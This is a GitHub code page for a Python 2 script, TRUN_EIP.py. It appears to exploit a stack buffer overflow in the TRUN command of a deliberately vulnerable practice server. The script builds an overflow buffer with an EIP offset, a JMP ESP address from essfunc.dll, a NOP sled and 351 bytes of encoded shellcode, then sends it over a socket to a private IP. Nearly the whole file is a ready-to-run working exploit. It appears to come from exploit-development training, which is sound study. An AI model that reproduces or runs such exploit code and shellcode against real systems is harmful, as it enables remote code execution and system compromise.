-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathTRUN_EIP.py
63 lines (46 loc) · 2.14 KB
/
TRUN_EIP.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
#!/usr/bin/python
import socket
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('192.168.101.158',9999))
# PAYLOAD LENGHT IS : 2809 with 2800 of A
buf = 'TRUN /.:/'
# [*] Exact match at offset 2003
buf += "A"*(2003)
# buf += "B"*4
# 625011AF JMP ESP in essfunc.dll
buf += "\xaf\x11\x50\x62"
# Payload size: 351 bytes
buf += "\x90"*40
buf += "\xda\xdf\xbf\x33\x2f\x25\xbd\xd9\x74\x24\xf4\x5d\x31"
buf += "\xc9\xb1\x52\x31\x7d\x17\x03\x7d\x17\x83\xf6\x2b\xc7"
buf += "\x48\x04\xdb\x85\xb3\xf4\x1c\xea\x3a\x11\x2d\x2a\x58"
buf += "\x52\x1e\x9a\x2a\x36\x93\x51\x7e\xa2\x20\x17\x57\xc5"
buf += "\x81\x92\x81\xe8\x12\x8e\xf2\x6b\x91\xcd\x26\x4b\xa8"
buf += "\x1d\x3b\x8a\xed\x40\xb6\xde\xa6\x0f\x65\xce\xc3\x5a"
buf += "\xb6\x65\x9f\x4b\xbe\x9a\x68\x6d\xef\x0d\xe2\x34\x2f"
buf += "\xac\x27\x4d\x66\xb6\x24\x68\x30\x4d\x9e\x06\xc3\x87"
buf += "\xee\xe7\x68\xe6\xde\x15\x70\x2f\xd8\xc5\x07\x59\x1a"
buf += "\x7b\x10\x9e\x60\xa7\x95\x04\xc2\x2c\x0d\xe0\xf2\xe1"
buf += "\xc8\x63\xf8\x4e\x9e\x2b\x1d\x50\x73\x40\x19\xd9\x72"
buf += "\x86\xab\x99\x50\x02\xf7\x7a\xf8\x13\x5d\x2c\x05\x43"
buf += "\x3e\x91\xa3\x08\xd3\xc6\xd9\x53\xbc\x2b\xd0\x6b\x3c"
buf += "\x24\x63\x18\x0e\xeb\xdf\xb6\x22\x64\xc6\x41\x44\x5f"
buf += "\xbe\xdd\xbb\x60\xbf\xf4\x7f\x34\xef\x6e\xa9\x35\x64"
buf += "\x6e\x56\xe0\x2b\x3e\xf8\x5b\x8c\xee\xb8\x0b\x64\xe4"
buf += "\x36\x73\x94\x07\x9d\x1c\x3f\xf2\x76\xe3\x68\x98\xb4"
buf += "\x8b\x6a\x60\xb8\xf0\xe2\x86\xd0\x16\xa3\x11\x4d\x8e"
buf += "\xee\xe9\xec\x4f\x25\x94\x2f\xdb\xca\x69\xe1\x2c\xa6"
buf += "\x79\x96\xdc\xfd\x23\x31\xe2\x2b\x4b\xdd\x71\xb0\x8b"
buf += "\xa8\x69\x6f\xdc\xfd\x5c\x66\x88\x13\xc6\xd0\xae\xe9"
buf += "\x9e\x1b\x6a\x36\x63\xa5\x73\xbb\xdf\x81\x63\x05\xdf"
buf += "\x8d\xd7\xd9\xb6\x5b\x81\x9f\x60\x2a\x7b\x76\xde\xe4"
buf += "\xeb\x0f\x2c\x37\x6d\x10\x79\xc1\x91\xa1\xd4\x94\xae"
buf += "\x0e\xb1\x10\xd7\x72\x21\xde\x02\x37\x0b\xe5\x4e\x15"
buf += "\x24\x40\x1b\x1b\x29\x73\xf6\x58\x54\xf0\xf2\x20\xa3"
buf += "\xe8\x77\x24\xef\xae\x64\x54\x60\x5b\x8a\xcb\x81\x4e"
buf += "C"*(2800-2003-4-351-40)
print "Fuzzing TRUN with %s bytes" % len(buf)
print s.recv(1024)
s.send(buf + '\r\n')
print s.recv(1024)
s.close()